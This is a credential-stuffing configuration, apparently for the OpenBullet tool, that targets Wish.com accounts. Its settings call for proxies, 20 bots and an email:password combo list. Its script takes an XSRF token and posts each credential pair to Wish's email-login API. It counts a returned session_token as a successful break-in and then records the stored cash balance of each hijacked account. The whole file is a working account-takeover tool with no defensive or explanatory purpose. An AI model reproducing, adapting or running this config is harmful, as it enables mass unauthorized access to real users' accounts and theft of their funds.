[SETTINGS]
{
  "Name": "Wish.com",
  "SuggestedBots": 20,
  "LastModified": "2019-02-08T05:49:25.7090802-08:00",
  "AdditionalInfo": "",
  "Author": "ur mum",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login_Get REQUEST GET "https://www.wish.com/api/email-login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<COOKIES(_xsrf)>" LR "" "" Recursive=FALSE -> VAR "TOKEN" "" "" 
#Login_Post REQUEST POST "https://www.wish.com/api/email-login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&url=https%3A%2F%2Fwww.wish.com%2F&web_auth_bucket=show-v2&_buckets=&_experiments=" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Origin: https://www.wish.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-XSRFToken: <TOKEN>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"session_token\":" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "session_token" 
    KEY "\"msg\": \"Email or Password is incorrect\"," 
#Login_Post_Get REQUEST POST "https://www.wish.com/api/commerce-cash-data/get" AutoRedirect=TRUE 
  CONTENT "{}" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Origin: https://www.wish.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "X-XSRFToken: <TOKEN>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
#Capture1 PARSE "<SOURCE>" JSON "amount" Recursive=FALSE -> CAP "Balance" "" "" 
